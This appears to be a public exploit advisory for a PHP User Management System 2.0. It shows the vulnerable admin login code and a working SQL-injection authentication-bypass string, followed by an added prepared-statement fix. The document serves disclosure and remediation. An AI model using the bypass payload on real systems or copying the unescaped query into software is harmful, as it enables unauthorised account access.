
8 changes to exploits/shellcodes User Management System 2.0 - Persistent Cross-Site Scripting User Management System 2.0 - Authentication Bypass Complaint Management System 4.2 - Persistent Cross-Site Scripting Complaint Management System 4.2 - Authentication Bypass Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User) Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit) Sky File 2.1.0 iOS - Directory Traversal
# Exploit Title: User Management System 2.0 - Authentication Bypass
# Author: Besim ALTINOK
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
# Version: v2.0
# Tested on: Xampp
# Credit: İsmail BOZKURT

------ Details:

1- Vulnerable code is here (admin login: /admin/index.php):

<?php
session_start();
include("dbconnection.php");
if(isset($_POST['login']))
{
    $adminusername=$_POST['username'];
    $pass=md5($_POST['password']);
    // $adminusername is placed into the SQL string unescaped (injection point)
    $ret=mysqli_query($con,"SELECT * FROM admin WHERE username='$adminusername' and password='$pass'");
    $num=mysqli_fetch_array($ret);
    // Any returned row is treated as a successful login
    if($num>0)
    {
        $extra="manage-users.php";
        $_SESSION['login']=$_POST['username'];
        $_SESSION['id']=$num['id'];
        echo "<script>window.location.href='".$extra."'</script>";
        exit();
    }
    else
    {
        $_SESSION['action1']="*Invalid username or password";
        $extra="index.php";
        echo "<script>window.location.href='".$extra."'</script>";
        exit();
    }
}

2- We can bypass authentication with SQLi:

Bypass code (user and admin login panel):

Username: pentester' or'1'=1#
Password: pentester' or'1'=1#

Finally: There are many SQLi-vulnerable inputs in this project, such as login, registration, forgot password ...
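
Mitigation sketch for the login handler in section 1, added here as an example and not taken from the vendor or the advisory author: the query is parameterized and legacy md5() hashes are upgraded on the next successful login. The helper name admin_login() is hypothetical, and the code assumes $con is the mysqli handle from dbconnection.php and that the admin.password column is wide enough (255 characters) for password_hash() output.

```php
<?php
// Added example: hardened admin login, not the vendor's code.
// Assumes the admin table has the id, username and password columns seen above.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // DB errors throw
session_start();
include("dbconnection.php");
// Hypothetical helper: returns the admin id on success, null on failure.
function admin_login(mysqli $con, string $username, string $password): ?int
{
    // The placeholder keeps user input out of the SQL text entirely.
    $stmt = $con->prepare("SELECT id, password FROM admin WHERE username = ?");
    $stmt->bind_param("s", $username);
    $stmt->execute();
    $stmt->bind_result($id, $stored);
    $found = $stmt->fetch();
    $stmt->close();
    if ($found !== true) {
        return null;
    }
    // Legacy rows hold unsalted md5(); accept them once, then upgrade.
    $legacy = strlen($stored) === 32 && ctype_xdigit($stored);
    $ok = $legacy ? hash_equals($stored, md5($password))
                  : password_verify($password, $stored);
    if (!$ok) {
        return null;
    }
    if ($legacy || password_needs_rehash($stored, PASSWORD_DEFAULT)) {
        $new = password_hash($password, PASSWORD_DEFAULT);
        $up = $con->prepare("UPDATE admin SET password = ? WHERE id = ?");
        $up->bind_param("si", $new, $id);
        $up->execute();
        $up->close();
    }
    return (int)$id;
}

if (isset($_POST['login'])) {
    $user = (string)($_POST['username'] ?? '');
    $id = admin_login($con, $user, (string)($_POST['password'] ?? ''));
    if ($id !== null) {
        session_regenerate_id(true); // fresh session id after login
        $_SESSION['login'] = $user;
        $_SESSION['id'] = $id;
        header("Location: manage-users.php");
    } else {
        $_SESSION['action1'] = "*Invalid username or password";
        header("Location: index.php");
    }
    exit();
}
```

The same prepared-statement pattern applies to the other inputs the advisory lists (registration, forgot password).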